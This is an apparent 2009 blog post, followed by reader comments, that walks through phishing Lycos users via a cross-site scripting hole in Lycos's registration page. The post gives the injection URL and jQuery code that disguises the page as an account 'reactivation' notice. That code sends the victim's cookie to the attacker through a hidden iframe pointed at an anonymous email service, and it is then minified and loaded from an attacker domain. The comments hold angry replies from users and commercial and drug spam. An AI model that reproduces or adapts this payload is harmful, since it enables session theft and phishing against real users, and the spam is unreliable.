This site is soon to be deprecated by http://www.johnleitch.net

Saturday, May 16, 2009

Phishing With jQuery - Registration.Lycos.Com

jQuery is a wonderful tool when the need to traverse the HTML DOM arises. With only a few lines of code the layout of a web page can be drastically altered. Using an XSS vulnerability and a bit of creativity we can manipulate http://registration.lycos.com, turning it into what appears to be a reactivation link that users must click to keep their accounts. When the user navigates to the page, the malicious code reads the value cookie and sends it to us using an anonymous mailing service. All of this will happen transparently as the user is waiting to be redirected to http://mail.lycos.com.



First, we need the vulnerability. https://registration.lycos.com/login.php?action=login&m_PR=27&m_CBURL=http://www.lycos.com/&m_U='/><script>alert('Hello, World');</script> will work.

Next is the jQuery. Using it we're going to alter the title and login form, then email the cookie value by appending a hidden iframe to TestDiv. The JavaScript below should fulfill these needs, mailing to you@yourdomain.com.

$(this).load(function() {
$('title').html('Reactivation');
$('form').html('<div id="TestDiv"></div><h3 style="color:green;margin:">Activated</h3>Your account has been reactivated.<br />Redirecting to <a href="http://mail.lycos.com">http://mail.lycos.com</a>...');
var u = 'http://send-anonymous-email.com/Record.php?email_from=someemail%40domain.com&email_to=you%40yourdomain.com&subject=Have+A+Cookie&message=' + escape(document.cookie) + '&kind=html';
$('#TestDiv').append('<iframe style="display:none;" src="' + u + '" />');

setTimeout("window.location='http://mail.lycos.com';", 5000);
});

To obscure our code and keep the URL short we can remove all unnecessary whitespace and append it to the end of the jQuery file. Doing so would look something like this:

[jQuery] $(this).load(function(){$('title').html('Reactivation');$('form').html('<div id="TestDiv"></div><h3 style="color:green;margin:">Activated</h3>Your account has been reactivated.<br />Redirecting to <a href="http://mail.lycos.com">http://mail.lycos.com</a>...');var u='http://send-anonymous-email.com/Record.php?email_from=someemail%40domain.com&email_to=you%40yourdomain.com&subject=Have+A+Cookie&message='+escape(document.cookie)+'&kind=html';$('#TestDiv').append('<iframe style="display:none;" src="'+u+'"/>');setTimeout("window.location='http://mail.lycos.com';",5000);});

Include the modified version of jQuery using the vulnerability and the result will look like the screenshot below.


https://registration.lycos.com/login.php?action=login&m_PR=27&m_CBURL=http://www.lycos.com/&m_U='/><script src="http://www.yourdomain.com/modifiedjQuery.js"></script>

18 comments:

  1. very cut and dried, easy to understand. You should be a technical writer.

    ReplyDelete
  2. Ummm, thanks a lot. So now all my private emails and account data is being sent to whom? Grrr, so crazy to think I'm a person who gives lots of my own free-time volunteering in my community and helping people out, and you are doing your best to fuck people over. What a crazy shitty world.

    ReplyDelete
  3. I think someone actually took your code and totally screwed up Lycos for real. Perhaps you should look into it and help them sort it all out before you get a call from about a million lawyers - especially ones from Lycos.

    ReplyDelete
  4. John,

    What does this means to all of us who are now locked out of our Lycos free email accounts?

    ReplyDelete
  5. What does this mean now that we've all given away our usernames & passwords?!? Or are they only after our credit card numbers?

    ReplyDelete
  6. First off, thanks to all for the feedback! Unfortunately this will not help anyone recover their free Lycos email account. As to whether the information contained in this post was used in a malicious manner, I do not know. If it was, such an occurance would be unfortunate and I certainly would not condone the acts of the individual(s) involved. This was posted for informational purposes only. Any anger should be redirected to those that provide a premium service with gaping holes in it. Exactly what information can be compromised using this vulnerability I am unsure of; I do not have a Lycos email account.

    ReplyDelete
    Replies
    1. I can not agree more with you!

      Delete
  7. LMAO ... that is awesome!

    ReplyDelete
  8. I, of course, a newcomer to this blog, but the author does not agree

    ReplyDelete
  9. January 16, 2011 and the security problem is still there!! Glad I don't have a Lycos account!

    ReplyDelete
  10. Once again great post. You seem to have a good understanding of these themes.When I entering your blog,I felt this . Come on and keep writting your blog will be more attractive. To Your Success!
    my computer has something wrong!
    maybe it does't update for a long time.

    Classic Dresses
    Classic Bridesmaid Dresses
    Wedding Dresses with Sleeves

    ReplyDelete
  11. I love it,Excellent article.I am decide to put this into use one of these days.Thank you for sharing this.To Your Success!
    _____________________________________________________________________________

    Rc Helicopter Parts|Rc Helicopter|Mini Rc Helicopter

    ReplyDelete
  12. We all know that we need some entertainments to help us relax ourselves,if you are interested in playing World Of Warcraft,and want to know more things about http://www.mmolive.com/ and http://www.mmohome.com/gold/Maple-Story-US.html,you can come to our home to enjoy more happy.

    ReplyDelete
  13. Thank you for sharing. It has already passed several days and we should let it go. I want to recommend you a reliable store http://www.gold4power.com selling wow gold with fast delivery speed. What's more, the code "sssss" will save you 5% of the total order.

    ReplyDelete
  14. salam kenal bos. lagi jalan jalan pagi nih

    ReplyDelete
  15. 聽說過“天生陽痿”嗎?

    網友:醫生你好,我有陽痿早泄威而鋼哪裡買 威而鋼 威而鋼 壯陽藥 威而鋼 犀利士哪裡買 壯陽藥品 壯陽藥 威而鋼 威而鋼哪裡買 威而鋼專賣店 威而鋼藥局 情色貼圖快兩年了,真的可以治威而鋼 犀利士 威而鋼哪裡買 犀利士 犀利士好嗎?
      醫生:有無包皮過長的情況?包皮過長易導致龜頭神經敏感,從而導致早泄。
      網友:沒有包皮過長。
      醫生:有尿頻、尿急、尿壯陽藥 壯陽藥 威而鋼 犀利士 犀利士 犀利士專賣 犀利士 犀利士5mg價格 壯陽藥品 犀利士專賣 威而鋼 壯陽藥不盡、尿等待、尿分叉的感覺嗎?
      網友:都沒有,就以前有手淫和性交過頻后來就開始了。
      醫生:以前性功能正常嗎?
      網友:正常,可現在一挺了就軟了,性交也一分鐘左右就泄了。
      醫生:有到醫院檢查過嗎?
      網友:沒有檢查過,但是有去藥店買過藥,吃了一段時間都沒有什么效果就沒有繼續吃了。
      醫生:首先治療疾病,建議還是先做檢查,確診病因后再對癥治療為佳。導致陽痿早泄的病因是多種的,如精神因素;任何可能導致犀利士 犀利士 犀利士 犀利士 犀利士 威而鋼 威而鋼 威而鋼 威而鋼哪裡買 威而鋼 威而鋼 威而鋼 威而鋼 犀利士 壯陽藥品去哪買 犀利士 犀利士 犀利士 犀利士 犀利士陰莖海綿體動脈血流減少的疾病;手術、外傷引起陰莖有關血管和神經損傷,導致勃起功能障礙;內分泌疾患、慢性病和長期服用某些藥物;前列腺炎、前列腺增生反復發作久治不愈等。
      網友:那難治療嗎?
      醫生:檢查確診后,只要你積極配合醫生對癥治療,是可以臨床治愈的。如果不是先天性的,不管是哪些疾病,只要查清楚,配合醫生都可以治療的。

    ReplyDelete